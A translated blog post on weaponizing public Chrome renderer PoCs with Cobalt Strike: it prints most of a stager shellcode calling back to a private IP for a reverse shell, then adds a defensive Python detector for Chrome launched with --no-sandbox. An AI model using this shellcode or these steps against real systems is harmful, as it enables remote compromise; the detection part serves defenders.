Getting a Cobalt Strike callback with the Chrome 0day
source link: https://misakikata.github.io/2021/04/CobaltStrike%E4%B8%8A%E7%BA%BFChrome-0day/
Thursday, April 15th 2021, 4:44 pm
Over the past couple of days two Chrome code-execution bugs were published, both of which only work in a --no-sandbox environment, so using them directly is a little inconvenient. First, add the Chrome launch parameter as follows
First run the first PoC, https://github.com/r4j0x00/exploits; here it just opens a local environment.
Next, try the other, newer one; Chrome's patched version 90 is affected as well: https://github.com/avboy1337/1195777-chrome0day
The shellcode format in this PoC looks very familiar, so I tried generating a C# payload with Cobalt Strike.
After generating it, extract the hexadecimal shellcode field from it; it looks like the following.
0xfc, 0x48, 0x83, 0xe4, 0xf0, 0xe8, 0xc8, 0x00, 0x00, 0x00, 0x41, 0x51, 0x41, 0x50, 0x52, 0x51, 0x56, 0x48, 0x31, 0xd2, 0x65, 0x48, 0x8b, 0x52, 0x60, 0x48, 0x8b, 0x52, 0x18, 0x48, 0x8b, 0x52, 0x20, 0x48, 0x8b, 0x72, 0x50, 0x48, 0x0f, 0xb7, 0x4a, 0x4a, 0x4d, 0x31, 0xc9, 0x48, 0x31, 0xc0, 0xac, 0x3c, 0x61, 0x7c, 0x02, 0x2c, 0x20, 0x41, 0xc1, 0xc9, 0x0d, 0x41, 0x01, 0xc1, 0xe2, 0xed, 0x52, 0x41, 0x51, 0x48, 0x8b, 0x52, 0x20, 0x8b, 0x42, 0x3c, 0x48, 0x01, 0xd0, 0x66, 0x81, 0x78, 0x18, 0x0b, 0x02, 0x75, 0x72, 0x8b, 0x80, 0x88, 0x00, 0x00, 0x00, 0x48, 0x85, 0xc0, 0x74, 0x67,
......
0xf9, 0x1f, 0x00, 0xc6, 0xf5, 0x3b, 0xd3, 0x99, 0x7b, 0x9a, 0xf4, 0xba, 0x71, 0x45, 0x52, 0x29, 0x67, 0xeb, 0x53, 0x59, 0xc5, 0x00, 0x41, 0xbe, 0xf0, 0xb5, 0xa2, 0x56, 0xff, 0xd5, 0x48, 0x31, 0xc9, 0xba, 0x00, 0x00, 0x40, 0x00, 0x41, 0xb8, 0x00, 0x10, 0x00, 0x00, 0x41, 0xb9, 0x40, 0x00, 0x00, 0x00, 0x41, 0xba, 0x58, 0xa4, 0x53, 0xe5, 0xff, 0xd5, 0x48, 0x93, 0x53, 0x53, 0x48, 0x89, 0xe7, 0x48, 0x89, 0xf1, 0x48, 0x89, 0xda, 0x41, 0xb8, 0x00, 0x20, 0x00, 0x00, 0x49, 0x89, 0xf9, 0x41, 0xba, 0x12, 0x96, 0x89, 0xe2, 0xff, 0xd5, 0x48, 0x83, 0xc4, 0x20, 0x85, 0xc0, 0x74, 0xb6, 0x66, 0x8b, 0x07, 0x48, 0x01, 0xc3, 0x85, 0xc0, 0x75, 0xd7, 0x58, 0x58, 0x58, 0x48, 0x05, 0x00, 0x00, 0x00, 0x00, 0x50, 0xc3, 0xe8, 0x9f, 0xfd, 0xff, 0xff, 0x31, 0x39, 0x32, 0x2e, 0x31, 0x36, 0x38, 0x2e, 0x31, 0x31, 0x31, 0x2e, 0x31, 0x33, 0x30, 0x00, 0x12, 0x34, 0x56, 0x78
Replace the shellcode field in the original exploit; it looks like the following.
When Chrome executes it, the page stays stuck in a loading, not-responding state, and in the Cobalt Strike console you can see a reverse shell from a chrome process.
However, since normal use with the default settings runs in the sandboxed environment, this vulnerability has no impact there, so it still needs to be combined with a sandbox escape to be effective.
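The point in the last paragraph, that these PoCs only work when Chrome's sandbox is turned off, gives defenders something concrete to look for: a Chrome process created with --no-sandbox on its command line. The following is an added example written for this page (it is not code from the original post or from either PoC repository). It scans process-creation records for such launches; the executable-name list and the sample events are constructed assumptions, not real telemetry.

```python
import re
from typing import Iterable, List, Tuple

# Executable names treated as Chrome/Chromium (assumed list; the post only
# discusses Chrome itself, other Chromium-based browsers accept the same flag).
CHROME_EXECUTABLES = {
    "chrome", "chrome.exe", "google-chrome", "google-chrome-stable",
    "chromium", "chromium-browser",
}

# Command-line switches that disable the browser sandbox entirely.
SANDBOX_DISABLING_FLAGS = {"--no-sandbox"}

# Tokenizer that honours double- and single-quoted arguments, so a quoted
# Windows path such as "C:\Program Files\...\chrome.exe" stays one token.
_TOKEN_RE = re.compile(r'"([^"]*)"|\'([^\']*)\'|(\S+)')


def tokenize(cmdline: str) -> List[str]:
    """Split a raw process command line into arguments."""
    return [a or b or c for a, b, c in _TOKEN_RE.findall(cmdline)]


def executable_name(path: str) -> str:
    """Lower-cased basename of an executable path, for '/' and '\\' separators."""
    return re.split(r"[\\/]", path)[-1].lower()


def is_unsandboxed_chrome(cmdline: str) -> bool:
    """True if the command line launches Chrome with its sandbox disabled."""
    tokens = tokenize(cmdline)
    if not tokens or executable_name(tokens[0]) not in CHROME_EXECUTABLES:
        return False
    return any(tok.lower() in SANDBOX_DISABLING_FLAGS for tok in tokens[1:])


def find_unsandboxed_chrome(events: Iterable[Tuple[str, str]]) -> List[Tuple[str, str]]:
    """Return the (pid, cmdline) records that launched Chrome without a sandbox."""
    return [(pid, cl) for pid, cl in events if is_unsandboxed_chrome(cl)]


# Constructed sample process-creation events (pid, command line), not real data.
SAMPLE_EVENTS = [
    ("1001", r'"C:\Program Files\Google\Chrome\Application\chrome.exe" --no-sandbox'),
    ("1002", r'"C:\Program Files\Google\Chrome\Application\chrome.exe" https://example.com'),
    # Renderer children inherit the flag from the browser process, so they match too.
    ("1003", r'"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-sandbox'),
    ("1004", "/usr/bin/google-chrome --no-sandbox --user-data-dir=/tmp/profile"),
    # Not Chrome: the flag alone is not enough to raise an alert.
    ("1005", "/usr/bin/notepad --no-sandbox"),
]


if __name__ == "__main__":
    for pid, cmdline in find_unsandboxed_chrome(SAMPLE_EVENTS):
        print(f"pid {pid}: Chrome started without sandbox: {cmdline}")
```

Run over real process-creation telemetry (Sysmon event 1, auditd execve, or an EDR export), this flags every Chrome launched with the sandbox off. Headless Chrome inside containers and some CI setups is commonly started with --no-sandbox on purpose, so tune the rule by user, host or parent process before treating a hit as an incident.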